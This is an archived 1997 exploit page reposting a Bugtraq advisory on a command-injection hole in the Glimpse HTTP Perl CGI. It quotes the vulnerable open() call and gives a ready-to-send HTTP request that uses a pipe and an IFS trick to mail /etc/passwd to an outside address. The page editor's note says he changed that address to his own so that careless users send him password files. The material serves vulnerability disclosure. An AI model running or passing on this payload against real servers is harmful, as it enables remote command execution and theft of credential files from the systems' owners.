Glimps HTTP evil inadequate evil char filter

Summary
Description:Glips HTTP, a web interface to the Glimps search program, doesn't adequately check its input for evil characters. By tricking it to open a pipe instead of a file, you can remotely execute arbitrary commands on the server.
Author:Razvan Dragomirescu <drazvan@kappa.ro>
Compromise:Execute arbitrary commands on a server running Glimps HTTP (remote).
Vulnerable Systems:Anything running a vulnerable and unmodified version of Glimpse HTTP. Runs on most systems.
Date:2 July 1997
Notes:Razvan Dragomirescu claims that he is getting "angry" at all the idiots who send him passwd files by not modifying his example exploit. But *I* wouldn't mind! So I've modified the exploit to use my address instead of his. DON'T FORGET TO CHANGE IT!
Details


Date: Wed, 2 Jul 1997 19:32:09 +0300
From: Razvan Dragomirescu <drazvan@kappa.ro>
To: BUGTRAQ@NETSPACE.ORG
Subject: Vulnerability in Glimpse HTTP

Hi,

I'm back with another vulnerability, this time in a small utility: Glimpse
HTTP which is an interface to the Glimpse search tool. It is written in
PERL.

First my congratulations to the authors. They've done a really great job
in securing the program (really, I mean it). The hole I exploited is a
small one but it can allow you to execute any command on the remote
system (as the owner of the http server).

Allow me to quote from the source (I'm sure I have the latest version, I
downloaded it 1 hour ago :) ).

--begin--

$path_info = $ENV{'PATH_INFO'};
$_ = $path_info;

# /<length>/$indexdir/$path is the format of the PATH_INFO

# might as well start the message now print "Content-type: text/html\n\n";
print "<HTML>\n"; print "<HEAD>\n";

if ( m|^/([0-9]*)(.*)$| ) {
        $length = $1;
        $path = $2;
        $path =~ s|"||g;  } else {
        &err_badargs;  }

$indexdir = substr($path,0,$length);
$relpath = substr($path,$length,length($path));

# print "<br>indexdir=$indexdir<br>relpath=$relpath<br>";

open(CONF,"$indexdir/archive.cfg") || &err_conf;

--end--

As you may see, it  splits PATH_INFO in two fields: $length and
$path and then takes the first $length characters from $path and puts them
in $indexdir (my phrasing is more twisted than my mind :) ).
The last line opens "$indexdir/archive.cfg".

Now for the evil part.
By setting $indexdir to a string that begins with '|', the system will
execute whatever it finds after the pipe, giving it as STDIN what you
write to the CONF handle.

The bad thing is that most HTTP servers won't let you use TABS or SPACES
in the PATH_INFO (not the case of Netscape servers anyway, but CERN and
Apache will do it). And I don't know how many "one word" commands can
anyone find (and make them do evil).

Here's where the famous IFS variable comes handy.
If $indexdir is set to something like
"|IFS=5;CMD=5mail5fyodor\@dhp.com\</etc/passwd;eval$CMD;echo"
it will execute the command in CMD using IFS as separator. The one above
sends me your /etc/passwd (so you'd better change something there :) ).
The last "echo" is used to ignore the rest of the string. An of course you
can use any other separator instead of "5".

Now for the exploit.

telnet target.machine.com 80

GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5fyodor\@dhp.com\</etc/passwd;eval$CMD;echo
HTTP/1.0

Note that the cgi-bin directory could be located somewhere else (for
example in /scripts or /cgi or a special directory just for glimpse...).
Also note that you HAVE to use all those backslahes in the command (perl
wants them there!).

I would like (again) to have some feedback from those who have Glimpse
installed on their systems. It should work if the script has not been
modified.

I think that would be all.

Be good.
Razvan

--
Razvan Dragomirescu
drazvan@kappa.ro, drazvan@romania.ro, drazvan@roedu.net
Phone: +40-1-6866621
"Smile, tomorrow will be worse" (Murphy)

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: